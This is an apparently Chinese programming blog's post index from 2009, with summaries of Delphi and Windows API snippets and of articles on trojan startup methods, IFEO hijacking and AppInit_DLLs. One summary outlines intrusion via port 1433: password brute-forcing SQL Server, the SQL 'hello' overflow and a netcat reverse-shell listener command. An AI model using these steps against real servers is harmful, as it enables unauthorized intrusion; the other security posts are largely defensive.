摘要:VC:头文件在“winbase.h” UINT GetDriveType( LPCTSTR lpRootPathName // root directory ); 函数功能 判断磁盘类型 参数说明 lpRootPathName 包含了根目录路径的字符串指针 返回值 DRIVE_UNKNOWN 未知的磁盘类型 DRIVE_NO_ROOT_DIR 说明lpR... 阅读全文
StrToInt / IntToStr Asm For Delphi
2009-11-26 20:57 by HYrz的菜园子, 389 阅读, 0 推荐, 收藏, 编辑
摘要:[代码][代码] 阅读全文
开启和关闭Windows xp 防火墙
2009-11-20 18:23 by HYrz的菜园子, 447 阅读, 0 推荐, 收藏, 编辑
摘要:开启和关闭Windows xp 防火墙(delphi编程)[代码] 阅读全文
获取网页源代码的最简单办法
2009-11-20 18:19 by HYrz的菜园子, 438 阅读, 0 推荐, 收藏, 编辑
摘要:获取网页源代码的最简单办法,就是利用 WinInet 单元中的函数:[代码]使用时,直接把收到的源代码显示出来:[代码] 阅读全文
总结各个端口的入侵
2009-11-20 17:57 by HYrz的菜园子, 250 阅读, 0 推荐, 收藏, 编辑
摘要:1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 ... 阅读全文
映像胁持讲解
2009-11-20 17:56 by HYrz的菜园子, 215 阅读, 0 推荐, 收藏, 编辑
摘要:由于最近病毒都采用了IFEO映像劫持技术,导致杀软无法运行或提示无法打开文件,最近此类病毒非常流行,病毒清除操作起来相对复杂一些,所以今天特意发帖强调大家注意。关于IFEO的介绍网络上有非常多,本文借用的是剑盟skyshine的帖子内容,感谢原作者!重要的是第五步的预防方法,简单有效,可达到防患于未然,避免中毒的苦恼。 基本症状:可能有朋友遇到过这样的情况,一个正常的程序,无论把他放在哪个位置或者... 阅读全文
多种多样 关于木马病毒的六种启动方式
2009-11-20 17:34 by HYrz的菜园子, 239 阅读, 0 推荐, 收藏, 编辑
摘要:木马是随计算机或Windows的启动而启动并掌握一定的控制权的,其启动方式可谓多种多样,通过注册表启动、通过System.ini启动、通过某些特定程序启动等,真是防不胜防。其实只要能够遏制住不让它启动,木马就没什么用了,这里就简单说说木马的启动方式,知己知彼百战不殆嘛。一、通过"开始\程序\启动" 隐蔽性:2星 应用程度:较低 这也是一种很常见的方式,很多正常的程序都用它,大家常用的QQ就... 阅读全文
电脑病毒反抗杀毒软件的主要手段
2009-11-20 17:33 by HYrz的菜园子, 263 阅读, 0 推荐, 收藏, 编辑
摘要:随着电脑的普及,出现了越来越多的对抗杀毒软件以及检测工具扫描的病毒,他们会关闭甚至删除杀毒软件以及检测工具。一般用户很难判断他们藏在哪里,做了些什么。而这时杀毒软件以及安全工具确普遍无法运行。 下面主要列举说明一些常见抗杀软类病毒的需要注意的检测位置。 一:Run键值 典型病毒:AV终结者变种 目的现象:开机启动双进程坚守、关闭杀毒程序等。 检测位置: HKLM\SOFTWARE\Microsof... 阅读全文
特殊注册表键值"AppInit_Dlls"
2009-11-20 17:32 by HYrz的菜园子, 529 阅读, 0 推荐, 收藏, 编辑
摘要:正常情况下它的值应该是空的。 这个项目表示每当一个程序启动的时候,appinit_dlls中的dll文件就会注入到该程序里面去启动。 举个例子:如果appinit_dlls=qhbpri.dll,那么在登录windows后,系统加载了explorer.exe,那么qhbpri.dll也会出现在其中。 如果被篡改,请按以下步骤操作: 1、打开注册表: 开始——运行—... 阅读全文
SetTimer 功能:定时API
2009-11-17 20:39 by HYrz的菜园子, 746 阅读, 0 推荐, 收藏, 编辑
摘要:使用API来做定时器是很简单的,主要就是一个SetTimer函数和KillTimer函数,下面是一个简单的例子: var i :Integer = 0;procedure TimerProc(hwnd:HWND;uMsg,idEvent:UINT;dwTime:DWORD); stdcall;begin inc(i); Form1.Caption := IntToStr(i);end;proced... 阅读全文